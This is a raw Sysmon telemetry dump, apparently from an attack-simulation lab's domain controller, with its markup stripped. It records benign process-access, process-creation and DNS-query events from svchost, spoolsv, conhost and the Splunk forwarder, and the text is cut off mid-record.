13:53:24.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002194Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002193Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002192Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002190Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002189Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.070{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002420Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8555-5FCF-6C00-000000009101}3856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002419Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002418Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002417Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002416Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002415Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002413Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002412Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002411Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002410Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8555-5FCF-6C00-000000009101}3856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002409Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.992{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8555-5FCF-6C00-000000009101}3856C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002408Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.996{10ACEC4A-8555-5FCF-6C00-000000009101}3856C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002407Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.074{10ACEC4A-8551-5FCF-2B00-000000009101}2636WIN-DC-9350fe80::f48a:7e9b:8cc9:e855;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002406Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.074{10ACEC4A-8551-5FCF-2B00-000000009101}2636WIN-DC-935010.0.1.14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002405Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.964{10ACEC4A-8551-5FCF-2B00-000000009101}2636WIN-DC-9350fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002404Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:23.855{10ACEC4A-8551-5FCF-3200-000000009101}2472WIN-DC-9350fe80::f48a:7e9b:8cc9:e855;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000002403Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8555-5FCF-6B00-000000009101}2568C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002402Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002401Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002400Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002399Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:25.867{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002398Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 